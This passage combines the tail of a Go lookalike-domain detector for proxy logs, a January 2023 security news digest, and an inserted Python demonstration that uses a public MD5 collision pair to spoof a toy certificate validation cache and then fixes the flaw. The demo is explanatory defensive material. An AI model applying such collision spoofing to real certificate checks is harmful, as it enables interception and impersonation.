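	for brand, owned := range brandAllowlist {
		if !strings.Contains(h, brand) {
			continue
		}
		ownedByBrand := false
		for _, d := range owned {
			if rd == d {
				ownedByBrand = true
			}
		}
		if !ownedByBrand {
			return brand, true
		}
	}
	return "", false
}

// scanProxyLog parses the three-field lines and returns every lookalike hit in
// log order; malformed lines are skipped rather than failing the whole scan.
func scanProxyLog(log string) []Alert {
	var alerts []Alert
	for _, line := range strings.Split(log, "\n") {
		f := strings.Fields(line)
		if len(f) != 3 {
			continue
		}
		if brand, hit := isLookalike(f[2]); hit {
			alerts = append(alerts, Alert{Time: f[0], User: f[1], Host: f[2], Brand: brand})
		}
	}
	return alerts
}

func main() {
	for _, a := range scanProxyLog(sampleProxyLog) {
		fmt.Printf("%s %s -> %s (lookalike of %s)\n", a.Time, a.User, a.Host, a.Brand)
	}
}
```

Because the phishing page forwards victims to the real login page after harvesting credentials, the user sees nothing wrong; the hit in the proxy log may be the only early signal, so it is worth routing these alerts to a forced credential rotation rather than just a ticket.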


                US offers $10M bounty for Hive ransomware links to foreign governments

                exploits government ransomware
                2023-01-26 https://www.bleepingcomputer.com/news/security/us-offers-10m-bounty-for-hive-ransomware-links-to-foreign-governments/
                The U.S. Department of State today offered up to $10 million for information that could help link the Hive ransomware group (or other threat actors) with foreign governments. [...] "

                Autosummary: "For information on the identification or location of any person who, while acting at the direction of a foreign government, participates in malicious cyber activities against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act." "Send us your information on Signal, Telegram, WhatsApp, or via our Tor-based tip line." "


                New Mimic ransomware abuses ‘Everything’ Windows search tool

                exploits ransomware
                2023-01-26 https://www.bleepingcomputer.com/news/security/new-mimic-ransomware-abuses-everything-windows-search-tool/
                A new ransomware family named "Mimic" has been spotted in the wild abusing the APIs of a legitimate Windows file search tool called "Everything" to achieve file enumeration. [...] "

                Autosummary: "


                Lexmark warns of RCE bug affecting 100 printer models, PoC released

                exploits
                2023-01-26 https://www.bleepingcomputer.com/news/security/lexmark-warns-of-rce-bug-affecting-100-printer-models-poc-released/
                Lexmark has released a security firmware update to fix a severe vulnerability that could enable remote code execution (RCE) on more than 100 printer models. [...] "

                Autosummary: To do that, head to “Settings → Network/Ports → TCP/IP → TCP/IP Port Access,” uncheck “TCP 65002 (WSD Print Service),” and save the changes. "


                UK NCSC warns of spear-phishing attacks from Russia-linked and Iran-linked groups

                financial
                2023-01-26 https://securityaffairs.com/141393/apt/ncsc-warns-seaborgium-ta453-attacks.html

                The U.K. National Cyber Security Centre (NCSC) warns of a surge in targeted spear-phishing attacks conducted by Russia-based and Iran-based nation-state actors, who are increasingly targeting organizations and individuals. The UK agency reported ongoing spear-phishing […]

                The post UK NCSC warns of spear-phishing attacks from Russia-linked and Iran-linked groups appeared first on Security Affairs.

                "

                Autosummary: More details + TTPs in this MSTIC blog: https://t.co/nVoF8GxrFQ — Microsoft Security Intelligence (@MsftSecIntel) August 15, 2022 Below are the recommendations provided by the agency in the advisory: use strong and separate passwords for your email account; turn on multi-factor authentication (also known as 2-step verification, or 2SV); protect your devices and networks by keeping them up to date; exercise vigilance; enable your email providers’ automated email scanning features; disable mail-forwarding. "


                5 facts about Vice Society, the ransomware group wreaking havoc on the education sector

                exploits ransomware
                2023-01-26 https://www.malwarebytes.com/blog/business/2023/01/5-facts-about-vice-society-the-ransomware-group-wreaking-havoc-on-k-12-schools

                Categories: Business

                In this article, we’ll arm you with five facts about Vice Society so you can get the upper-hand against this persistent education sector threat.

                (Read more...)

                The post 5 facts about Vice Society, the ransomware group wreaking havoc on the education sector appeared first on Malwarebytes Labs.

                "

                Autosummary: In 2022 they were far and away the biggest attackers on the education sector If you’re a regular reader of our monthly ransomware review, you know that the education sector has gotten plenty of attention from ransomware gangs in the last year, to say the least. We don’t want to say launching ransomware on K-12 schools, colleges, and universities is as easy as taking candy from a baby, but unfortunately that’s how many RaaS gangs see it. A few of the institutions published on their leak site last year include De Montfort School, Cincinnati State, and one that made national headlines in September: Los Angeles Unified, the second largest school district in the US. "


                Haiti police riot after crime gangs kill 14 officers

                industry
                2023-01-26 https://www.bbc.co.uk/news/world-latin-america-64421308?at_medium=RSS&at_campaign=KARANGA
                Fourteen police officers have died since the start of 2023 amid a huge surge in gang violence. "

                Autosummary: "


                US hacks back against Hive ransomware crew

                exploits ransomware
                2023-01-26 https://www.bbc.co.uk/news/technology-64418723?at_medium=RSS&at_campaign=KARANGA
                The US Department of Justice says its operation against the cyber gang was a 21st Century stakeout. "

                Autosummary: "


                How to tackle the cybersecurity skills shortage in the EU

                ciber
                2023-01-25 https://www.helpnetsecurity.com/2023/01/25/cybersecurity-skills-shortage-eu/

                The cybersecurity skills shortage is a global problem, but each region – including Europe or, more specifically, the EU – has distinct problems it has to tackle to solve it. In this Help Net Security interview, Dritan Saliovski, Director – Nordic Head of Cyber M&A, Transaction Advisory Services at Aon, offers some pointers, as well as advice to organizations on how to attract and retain the best cybersecurity talent. The cybersecurity skills shortage is still a … More

                The post How to tackle the cybersecurity skills shortage in the EU appeared first on Help Net Security.

                "

                Autosummary: Studies and surveys, such as Glassdoor, Deloitte and Gallup, have found that a positive work-life balance, opportunities for growth and development, a positive company culture, and a clear mission and values that align with the employee’s personal values are important factors in attracting and retaining top talent. In conclusion, addressing the cybersecurity skills shortage requires a multi-pronged approach that includes targeted training and education programs, incentives to attract and retain talent, building a diverse and inclusive workforce, investing in new technologies, and opening the door for entry-level candidates. To mitigate this issue, organizations must take a multi-pronged approach, including targeted training and education programs, incentives to attract and retain talent in the cybersecurity field, building a diverse and inclusive workforce, and investing in technologies that automate certain tasks. Another effective approach is the training programs provided by the big four consulting firms, such as Deloitte, EY, KPMG, and PwC. These firms are known for their rigorous and comprehensive training programs, which provide opportunities for entry-level candidates to join the firm through internships and entry-level positions. Additionally, organizations can open the door to entry-level candidates by creating and promoting internship, apprenticeship, and entry-level positions, which provide opportunities for individuals to gain the necessary skills and experience to advance in the cybersecurity field. 
                Aiming for 7-8 hours of sleep; regular physical activity; building and maintaining positive relationships; setting aside time each day to do something you enjoy; meditate; self-reflect; internalize your day. As a leader, I understand the importance of addressing stress and burnout in the cybersecurity industry. This should include standardizing cybersecurity education and certification across the EU, encouraging more individuals to enter the cybersecurity field, considering tax reform and security clearance, and investing in training and development programs to help individuals acquire these skills. "


                LastPass Parent Company GoTo Suffers Data Breach, Customers' Backups Compromised

                financial
                2023-01-25 https://thehackernews.com/2023/01/lastpass-parent-company-goto-suffers.html
                LastPass-owner GoTo (formerly LogMeIn) on Tuesday disclosed that unidentified threat actors were able to steal encrypted backups of some customers' data along with an encryption key for some of those backups in a November 2022 incident. The breach, which targeted a third-party cloud storage service, impacted Central, Pro, join.me, Hamachi, and RemotelyAnywhere products, the company said. "The "

                Autosummary: "


                Riot Games breached: How did it happen?

                industry
                2023-01-25 https://www.helpnetsecurity.com/2023/01/25/riot-games-breached/

                The hackers who breached Riot Games last week are asking for $10 million not to leak the stolen source code for the company’s popular League of Legends online game. The company has also confirmed that source code for TFT (Teamfight Tactics) and a legacy anti-cheat platform (Packman) were exfiltrated by the attackers, but said they won’t be paying the ransom. It all started with social engineering Last week, Riot Games said that systems in their … More

                The post Riot Games breached: How did it happen? appeared first on Help Net Security.

                "

                Autosummary: The operator of malware repository vx-underground has professedly spoken to the attacker, who said they got in by social engineering a Riot Games employee via SMS, that they managed to pivot through the company network and escalate privileges by social engineering a company director, but that they did not deploy malware (e.g., ransomware) on company systems. "


                North Korean Hackers Turn to Credential Harvesting in Latest Wave of Cyberattacks

                ciber
                2023-01-25 https://thehackernews.com/2023/01/north-korean-hackers-turn-to-credential.html
                A North Korean nation-state group notorious for crypto heists has been attributed to a new wave of malicious email attacks as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy. The state-aligned threat actor is being tracked by Proofpoint under the name TA444, and by the larger cybersecurity community as "

                Autosummary: "


                New stealthy Python RAT malware targets Windows in attacks

                exploits
                2023-01-25 https://www.bleepingcomputer.com/news/security/new-stealthy-python-rat-malware-targets-windows-in-attacks/
                A new Python-based malware has been spotted in the wild featuring remote access trojan (RAT) capabilities to give its operators control over the breached systems. [...] "

                Autosummary: Execute shell commands; perform host enumeration; extract passwords and cookies from web browsers; steal data from the clipboard; detect anti-virus tools running on the host. Stealing data from Chrome, Brave, Opera, and Edge browsers (Securonix) Securonix researchers say that the malware "leverages Python's built-in Socket. "


                Peru protests: President calls for "truce" after clashes

                latam
                2023-01-25 https://www.bbc.co.uk/news/world-latin-america-64399219?at_medium=RSS&at_campaign=KARANGA
                Dina Boluarte says radical groups are behind the ongoing demonstrations calling for her to resign. "

                Autosummary: "


                Zacks Investment Research data breach affects 820,000 clients

                financial
                2023-01-25 https://www.bleepingcomputer.com/news/security/zacks-investment-research-data-breach-affects-820-000-clients/
                Hackers breached Zacks Investment Research (Zacks) company last year and gained access to personal and sensitive information belonging to 820,000 customers. [...] "

                Autosummary: "


                Botnets exploited Realtek SDK critical bug in millions of attacks

                exploits
                2023-01-25 https://www.bleepingcomputer.com/news/security/botnets-exploited-realtek-sdk-critical-bug-in-millions-of-attacks/
                Hackers have leveraged a critical remote code execution vulnerability in Realtek Jungle SDK in 134 million attacks trying to infect smart devices in the second half of 2022. [...] "

                Autosummary: Vietnam, Russia, The Netherlands, France, Luxembourg, and Germany were also found to be in the top seven countries from which we observed threat actors taking part in these attacks” - Palo Alto Networks Unit 42 Realtek SDK flaw details CVE-2021-35394 is a critical (CVSS v3: 9.8) vulnerability in Realtek Jungle SDK version 2.x to 3.4.14B, caused by multiple memory corruption flaws that allow remote unauthenticated attackers to perform arbitrary command injection. "


                Exploit released for critical Windows CryptoAPI spoofing bug

                exploits
                2023-01-25 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-windows-cryptoapi-spoofing-bug/
                Proof of concept exploit code has been released by Akamai researchers for a critical Windows CryptoAPI vulnerability discovered by the NSA and U.K.'s NCSC allowing MD5-collision certificate spoofing. [...] "

                Autosummary: Should an attack using a CVE-2022-34689 exploit be successful, it could also provide attackers with the ability to perform man-in-the-middle attacks and decrypt confidential information on user connections to the affected software, such as web browsers that use Windows' CryptoAPI cryptography library. "
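                The article summarises CVE-2022-34689 as "MD5-collision certificate spoofing": a trust decision that identifies a certificate by its MD5 fingerprint can be satisfied by a different blob with the same fingerprint. The example below is added here and is not Akamai's proof of concept or code from the article; it reproduces that failure mode with a toy validation cache. The two colliding inputs are the public Wang et al. (2004) MD5 collision pair standing in for DER-encoded certificates (they are not real certificates), and the cache design is an assumption made for illustration, not a description of Windows internals.

```python
import hashlib
import hmac
from typing import Dict, Optional

# Two distinct 128-byte inputs with identical MD5 digests: the collision pair
# published by Wang et al. in 2004. Here they stand in for the DER bytes of two
# different certificates; they are not certificates.
WANG_A = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70"
)
WANG_B = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70"
)


def same_fingerprint(algo: str, a: bytes, b: bytes) -> bool:
    """True if `a` and `b` collide under the named hash algorithm."""
    return hashlib.new(algo, a).digest() == hashlib.new(algo, b).digest()


class ValidationCache:
    """Toy cache (assumption for this example) that remembers certificates
    which already passed an expensive chain validation, keyed only by a
    fingerprint of their bytes. Whatever the fingerprint maps to is trusted."""

    def __init__(self, algo: str) -> None:
        self.algo = algo
        self._trusted: Dict[bytes, bytes] = {}

    def fingerprint(self, cert_der: bytes) -> bytes:
        return hashlib.new(self.algo, cert_der).digest()

    def remember(self, cert_der: bytes) -> None:
        # Pretend full validation of cert_der succeeded and cache the result.
        self._trusted[self.fingerprint(cert_der)] = cert_der

    def lookup(self, cert_der: bytes) -> Optional[bytes]:
        """Weak design: a fingerprint hit is taken as 'already validated'."""
        return self._trusted.get(self.fingerprint(cert_der))

    def lookup_hardened(self, cert_der: bytes) -> Optional[bytes]:
        """Fix: a hit only short-circuits validation if the full certificate
        bytes match the cached entry, so a colliding blob is a cache miss."""
        hit = self._trusted.get(self.fingerprint(cert_der))
        if hit is not None and hmac.compare_digest(hit, cert_der):
            return hit
        return None


def is_spoofable(algo: str, trusted: bytes, presented: bytes) -> bool:
    """Would a fingerprint-only cache using `algo` accept `presented`
    (different bytes) as the previously validated `trusted` certificate?"""
    cache = ValidationCache(algo)
    cache.remember(trusted)
    hit = cache.lookup(presented)
    return hit is not None and hit != presented


def is_spoofable_hardened(algo: str, trusted: bytes, presented: bytes) -> bool:
    """Same question against the byte-comparing lookup."""
    cache = ValidationCache(algo)
    cache.remember(trusted)
    hit = cache.lookup_hardened(presented)
    return hit is not None and hit != presented


if __name__ == "__main__":
    print("md5 collision:", same_fingerprint("md5", WANG_A, WANG_B))
    print("sha256 collision:", same_fingerprint("sha256", WANG_A, WANG_B))
    print("md5-keyed cache spoofable:", is_spoofable("md5", WANG_A, WANG_B))
    print("sha256-keyed cache spoofable:", is_spoofable("sha256", WANG_A, WANG_B))
    print("hardened md5 cache spoofable:", is_spoofable_hardened("md5", WANG_A, WANG_B))
```

                Moving the key to SHA-256 closes the hole against today's attacks, but the structural fix is the second one: a cache hit must never replace the comparison of the full certificate bytes, because a fingerprint is an index into trusted state, not a proof of identity.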


                Malware exploited critical Realtek SDK bug in millions of attacks

                exploits
                2023-01-25 https://www.bleepingcomputer.com/news/security/malware-exploited-critical-realtek-sdk-bug-in-millions-of-attacks/
                Hackers have leveraged a critical remote code execution vulnerability in Realtek Jungle SDK in 134 million attacks trying to infect smart devices in the second half of 2022. [...] "

                Autosummary: Vietnam, Russia, The Netherlands, France, Luxembourg, and Germany were also found to be in the top seven countries from which we observed threat actors taking part in these attacks” - Palo Alto Networks Unit 42 Realtek SDK flaw details CVE-2021-35394 is a critical (CVSS v3: 9.8) vulnerability in Realtek Jungle SDK version 2.x to 3.4.14B, caused by multiple memory corruption flaws that allow remote unauthenticated attackers to perform arbitrary command injection. "


                Grand Theft Auto 5 exploit allows cheaters to tamper with your data

                exploits
                2023-01-25 https://www.malwarebytes.com/blog/news/2023/01/grand-theft-auto-5-exploit-allows-cheaters-to-tamper-with-your-data

                Categories: News

                Tags: GTAV

                Tags: grand theft auto 5

                Tags: game

                Tags: gaming

                Tags: rockstar

                Tags: exploit

                Tags: corruption

                Tags: profile

                Tags: data

                We take a look at reports of players having their GTAV data corrupted by exploiters.

                (Read more...)

                The post Grand Theft Auto 5 exploit allows cheaters to tamper with your data appeared first on Malwarebytes Labs.

                "

                Autosummary: One thing to note where corrupted data messages are concerned: if you’re a modder, and you see a corrupted profile message, it may not be a compromise. "


                Zacks Investment Research data breach impacted hundreds of thousands of customers

                financial
                2023-01-25 https://securityaffairs.com/141343/data-breach/zacks-investment-research-data-breach.html

                Zacks Investment Research (Zacks) disclosed a data breach; the security incident may have exposed the personal information of 820,000 customers. “On December 28, 2022, Zacks learned that an unknown third-party had gained unauthorized access to certain […]

                The post Zacks Investment Research data breach impacted hundreds of thousands of customers appeared first on Security Affairs.

                "

                Autosummary: "


                Peru's President Boluarte calls for truce as protests flare in Lima

                latam
                2023-01-25 https://www.bbc.co.uk/news/world-latin-america-64400615?at_medium=RSS&at_campaign=KARANGA
                Dina Boluarte says ongoing unrest has caused $1.3bn (£1.56bn) in damages to infrastructure and output. "

                Autosummary: "


                Brazil airlifts starving Yanomami tribal people from jungle

                latam
                2023-01-24 https://www.bbc.co.uk/news/world-64381922?at_medium=RSS&at_campaign=KARANGA
                The government declares a medical emergency and ex-president Bolsonaro is accused of "genocide". "

                Autosummary: "


                How Microsoft is helping Ukraine’s cyberwar against Russia

                ciber
                2023-01-24 https://www.computerworld.com/article/3685939/how-microsoft-is-helping-ukraine-s-cyberwar-against-russia.html#tk.rss_security

                One of the big surprises in Russia’s war against Ukraine has been how well Ukraine has fended off Russian cyberattacks. Ad hoc groups of white-hat hackers have helped, as have a number of nations and the US government.

                Less well known is that tech companies, including Microsoft, are part of the effort. That aid ranges from giving advice to identifying attacks, offering fixes for them, and providing Ukraine with free tech and security services.

                Microsoft isn’t just trying to help defend a country under siege from an aggressive, more-powerful neighbor. Russian cyberattacks against Ukraine can also get loose in the wild and do damage to enterprises and organizations that rely on Microsoft technology. (Russia could also deliberately target private companies with those attacks.)

                To read this article in full, please click here

                "

                Autosummary: The day before the ground invasion began, Russia’s military intelligence service, the GRU, “launched destructive wiper attacks on hundreds of systems in Ukrainian government, IT, energy, and financial organizations,” according to Microsoft. Microsoft’s Tom Burt, corporate vice president for customer security and trust, said in a blog post last year that Microsoft’s Threat Intelligence Center (MSTIC) found wiper malware in more than a dozen Ukrainian networks, alerted the Ukrainian government to it, and opened a 24/7 cybersecurity hotline to help fight it. Microsoft offered a week-by-week account of Russia’s cyberattacks and listed some of the most dangerous pieces of malware being used, many of which target networks, Windows PCs, and .NET, Microsoft’s open source developer platform. "


                Apple delivers belated zero-day patch for iOS v12 (CVE-2022-42856)

                exploits
                2023-01-24 https://www.helpnetsecurity.com/2023/01/24/cve-2022-42856-ios-v12/

                Apple has released security updates for macOS, iOS, iPadOS and watchOS, patching – among other things – a type confusion flaw in the WebKit component (CVE-2022-42856) that could be exploited for remote code execution on older iPhones and iPads running iOS v12. “Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1,” the company said. CVE-2022-42856 was a zero-day vulnerability flagged by Clément … More

                The post Apple delivers belated zero-day patch for iOS v12 (CVE-2022-42856) appeared first on Help Net Security.

                "

                Autosummary: "


                Emotet Malware Makes a Comeback with New Evasion Techniques

                exploits
                2023-01-24 https://thehackernews.com/2023/01/emotet-malware-makes-comeback-with-new.html
                The Emotet malware operation has continued to refine its tactics in an effort to fly under the radar, while also acting as a conduit for other dangerous malware such as Bumblebee and IcedID. Emotet, which officially reemerged in late 2021 following a coordinated takedown of its infrastructure by authorities earlier that year, has continued to be a persistent threat that's distributed via "

                Autosummary: "


                Apple Issues Updates for Older Devices to Fix Actively Exploited Vulnerability

                exploits
                2023-01-24 https://thehackernews.com/2023/01/apple-issues-updates-for-older-devices.html
                Apple has backported fixes for a recently disclosed critical security flaw affecting older devices, citing evidence of active exploitation. The issue, tracked as CVE-2022-42856, is a type confusion vulnerability in the WebKit browser engine that could result in arbitrary code execution when processing maliciously crafted web content. While it was originally addressed by the company on November "

                Autosummary: "


                CISA added Zoho ManageEngine RCE (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog

                exploits
                2023-01-24 https://securityaffairs.com/141248/security/zoho-manageengine-2022-47966-known-exploited-vulnerabilities-catalog.html

                US CISA added the Zoho ManageEngine RCE vulnerability CVE-2022-47966 to its Known Exploited Vulnerabilities Catalog. The US CISA added the Zoho ManageEngine remote code execution flaw (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog. The CVE-2022-47966 flaw is an unauthenticated remote code execution vulnerability that impacts multiple Zoho products with SAML SSO enabled in the ManageEngine setup. The […]

                The post CISA added Zoho ManageEngine RCE (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Riot Games receives ransom demand from hackers, refuses to pay

                industry
                2023-01-24 https://www.bleepingcomputer.com/news/security/riot-games-receives-ransom-demand-from-hackers-refuses-to-pay/
                Riot Games says it will not pay the ransom demanded by the attackers responsible for the security breach the company disclosed last week. [...] "

                Autosummary: Lapsus$ is known for hacking into the network of a series of high-profile companies, including Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "


                Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection

                exploits
                2023-01-24 https://thehackernews.com/2023/01/chinese-hackers-utilize-golang-malware.html
                Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers. "The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today. A striking "

                Autosummary: "


                Ransomware access brokers use Google ads to breach your network

                exploits
                2023-01-24 https://www.bleepingcomputer.com/news/security/ransomware-access-brokers-use-google-ads-to-breach-your-network/
                A threat actor tracked as DEV-0569 uses Google Ads in widespread, ongoing advertising campaigns to distribute malware, steal victims' passwords, and ultimately breach networks for ransomware attacks. [...] "

                Autosummary: In this Google ads campaign, the threat actors distribute malware through websites pretending to be popular software, such as AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and, strangely, websites for W-9 IRS forms. These ads pretend to be websites for popular software programs, like LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC. "


                VMware fixes critical security bugs in vRealize log analysis tool

                exploits
                2023-01-24 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-security-bugs-in-vrealize-log-analysis-tool/
                VMware released security patches on Tuesday to address vRealize Log Insight vulnerabilities that could enable attackers to gain remote execution on unpatched appliances. [...] "

                Autosummary: "


                Own an older iPhone? Check you're on the latest version to avoid this bug

                exploits
                2023-01-24 https://www.malwarebytes.com/blog/news/2023/01/own-an-older-iphone-check-youre-on-the-latest-version-to-avoid-this-bug

                Categories: Apple

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: iOS 12.5.7

                Tags: CVE-2022-42856

                Tags: type confusion

                Tags: WebKit

                Apple has now released security content for iOS 12.5.7 which includes a patch for an actively exploited vulnerability in WebKit and many other updates.

                (Read more...)

                The post Own an older iPhone? Check you're on the latest version to avoid this bug appeared first on Malwarebytes Labs.

                "

                Autosummary: Affected devices The patch is available for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). "


                Riot Games compromised, new releases and patches halted

                industry
                2023-01-24 https://www.malwarebytes.com/blog/news/2023/01/riot-games-reveals-compromise-of-development-environment

                Categories: News

                Tags: Riot Games

                Tags: valorant

                Tags: league of legends

                Tags: compromise

                Tags: development

                Tags: patch

                Tags: patching

                Tags: update

                Riot Games has revealed that it has been compromised after a social engineering attack.

                (Read more...)

                The post Riot Games compromised, new releases and patches halted appeared first on Malwarebytes Labs.

                "

                Autosummary: For now Riot, stewards of titles such as Valorant and League of Legends, made the following statement in relation to the attack: Earlier this week, systems in our development environment were compromised via a social engineering attack. "


                VMware warns of critical code execution bugs in vRealize Log Insight

                exploits
                2023-01-24 https://securityaffairs.com/141298/security/vmware-vrealize-log-insight-rce.html

                A critical vulnerability in the VMware vRealize Log Insight appliance can allow an unauthenticated attacker to take full control of a target system. VMware addressed multiple vulnerabilities, tracked as CVE-2022-31706, CVE-2022-31704, CVE-2022-31710, and CVE-2022-31711, in its vRealize Log Insight appliance. vRealize Log Insight is a log collection and analytics virtual appliance that enables administrators to collect, view, […]

                The post VMware warns of critical code execution bugs in vRealize Log Insight appeared first on Security Affairs.

                "

                Autosummary: "


                Why most IoT cybersecurity strategies give zero hope for zero trust

                industry ciber
                2023-01-23 https://www.helpnetsecurity.com/2023/01/23/iot-cybersecurity-strategies-zero-trust-video/

                IoT remains the biggest hurdle in achieving an effective zero-trust security posture across an organization. In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT.

                The post Why most IoT cybersecurity strategies give zero hope for zero trust appeared first on Help Net Security.

                "

                Autosummary: "


                The loneliness of leading a cybersecurity startup

                ciber
                2023-01-23 https://www.helpnetsecurity.com/2023/01/23/leading-cybersecurity-startup/

                Linor spends her days working with cybersecurity founders at her Venture Capital firm. Gaining insight into their experiences over the course of building these relationships and supporting the brick-laying of their visions, she shares observations on the tough – and often undiscussed – impact their startup journey has on emotional wellness and self-care. The world of well-invested startups is a glamorous beacon to highly motivated entrepreneurs across the cybersecurity industry, and the ultimate responsibility for reaching … More

                The post The loneliness of leading a cybersecurity startup appeared first on Help Net Security.

                "

                Autosummary: When building something unprecedented and game-changing, the course and rules are steeped in darkness and uncertainty, with naysayers, critics, board members, competitors and time itself hurling criticisms every step of the way. Mentors are most likely to appreciate the toll leadership can take on the overall health of founders, who, under so much stress, often sacrifice things like eating well, sleeping well, family time and investing in personal growth. As investors who generate in-house services and accelerate growth for these founders, we do, at the very least, offer hands-on support and guidance across different company-building responsibilities. However, this determination alone is hardly enough to contend with the true reality of executive leadership; as VP of HR with the opportunity to frequently meet the Israeli tech sector’s best and brightest, I’ve come to appreciate how emotional resilience is no less important than passion, technical knowhow or business acumen. "


                Video game firm Riot Games hacked, now it faces problems to release content

                industry
                2023-01-23 https://securityaffairs.com/141171/cyber-crime/riot-games-hacked.html

                Video game developer and publisher Riot Games announced that it will delay the release of game patches after a security incident. Riot Games is an American video game developer, publisher and esports tournament organizer known for the creation of the popular games League of Legends and Valorant. Last week threat actors hacked the company’s systems in its development environment, Riot Games […]

                The post Video game firm Riot Games hacked, now it faces problems to release content appeared first on Security Affairs.

                "

                Autosummary: "


                FanDuel gamblers warned of phishing threat after data breach at Mailchimp

                financial
                2023-01-23 https://grahamcluley.com/fanduel-gamblers-warned-of-phishing-threat-after-data-breach-at-mailchimp/
                The important thing to realise about the most recently-reported data breach at email newsletter service Mailchimp is that it’s not just Mailchimp’s customer data that was put at risk. Even if you’re not personally a customer of Mailchimp, even if you’ve never even heard of Mailchimp, you may be affected. "

                Autosummary: Which is why FanDuel has found itself in the embarrassing position of contacting customers who were exposed by the breach, and warning them that even though passwords, financial information, and the like were not exposed… names and email addresses are now in the hands of cybercriminals. "


                GTA Online bug exploited to ban, corrupt players’ accounts

                exploits
                2023-01-23 https://www.bleepingcomputer.com/news/security/gta-online-bug-exploited-to-ban-corrupt-players-accounts/
                Grand Theft Auto (GTA) Online players report losing game progress, in-game money being stolen, and being banned from game servers due to an alleged vulnerability in the game's PC version. [...] "

                Autosummary: AVOID GTAO ON PC RIGHT NOW#GTAOnline pic.twitter.com/1SqGmz38Jw — floorball (@Fluuffball) January 21, 2023 A Twitter user, Tez2, who closely follows Rockstar Games, stated that users should avoid playing the game without a firewall rule, or better, not play it at all. "


                Microsoft plans to kill malware delivery via Excel XLL add-ins

                exploits
                2023-01-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-plans-to-kill-malware-delivery-via-excel-xll-add-ins/
                Microsoft is working on adding XLL add-in protection for Microsoft 365 customers by including automated blocking of all such files downloaded from the Internet. [...] "

                Autosummary: Excel XLL warning (BleepingComputer) As Cisco Talos said in a January report, XLLs are now used by both financially-motivated attackers and state-backed threat groups (APT10, FIN7, Donot, TA410) as an infection vector to deliver first-stage payloads onto their targets' devices. "


                Companies impacted by Mailchimp data breach warn their customers

                financial
                2023-01-23 https://securityaffairs.com/141203/data-breach/companies-impacted-by-mailchimp-breach.html

                The recent Mailchimp data breach has impacted multiple organizations, and some of them are already notifying their customers. The popular email marketing and newsletter platform Mailchimp recently disclosed a new data breach; the incident exposed the data of 133 customers. Threat actors targeted the company’s employees and contractors to gain access to an internal support and […]

                The post Companies impacted by Mailchimp data breach warn their customers appeared first on Security Affairs.

                "

                Autosummary: “In a note to customers, WooCommerce said it was notified by Mailchimp a day later that the breach may have exposed the names, store web addresses and email addresses of its customers, though it said no customer passwords or other sensitive data was taken.” "


                Apple fixes actively exploited iOS zero-day on older iPhones, iPads

                exploits
                2023-01-23 https://www.bleepingcomputer.com/news/apple/apple-fixes-actively-exploited-ios-zero-day-on-older-iphones-ipads/
                Apple has backported security patches addressing a remotely exploitable zero-day vulnerability to older iPhones and iPads. [...] "

                Autosummary: "


                CISA warns of critical ManageEngine RCE bug exploited in attacks

                exploits
                2023-01-23 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-manageengine-rce-bug-exploited-in-attacks/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added a remote code execution (RCE) affecting most Zoho ManageEngine products to its catalog of bugs known to be exploited in the wild. [...] "

                Autosummary: Make sure to update to fixed versions as specified in the ManageEngine advisory https://t.co/BIRlXnHkAT — Shadowserver (@Shadowserver) January 19, 2023 All orgs urged to prioritize patching All Federal Civilian Executive Branch Agencies (FCEB) agencies must patch their systems against this actively exploited bug after it was added to CISA's Known Exploited Vulnerabilities (KEV) catalog, according to a binding operational directive (BOD 22-01) issued in November 2021. "


                After data breach put their lives at risk, US releases 3000 immigrants seeking asylum

                financial
                2023-01-23 https://www.bitdefender.com/blog/hotforsecurity/after-data-breach-put-their-lives-at-risk-us-releases-3000-immigrants-seeking-asylum/
                Imagine you're an immigrant, who has fled your home country for the United States due to fear of being persecuted and tortured. What you definitely do not want is the agency handling your asylum request being careless with your personal information - and potentially putting your life and that of loved ones at risk. Read more in my article on the Hot for Security blog. "

                Autosummary: And yet, despite the safeguards and regulations, the lives of thousands of people have been endangered after US Immigration and Customs Enforcement (ICE), a branch of the DHS, carelessly published their personal details on its website. "


                Ransomware revenue significantly down over 2022

                exploits
                2023-01-23 https://www.malwarebytes.com/blog/news/2023/01/ransomware-revenue-significantly-down-over-2022

                Categories: News

                Categories: Ransomware

                Tags: ransomware

                Tags: revenue

                Tags: attacks

                Tags: negotiators

                Tags: back-ups

                Tags: restore

                Tags: Continental

                According to blockchain data platform Chainalysis, ransomware revenue plummeted significantly in 2022 due to a growing unwillingness to pay.


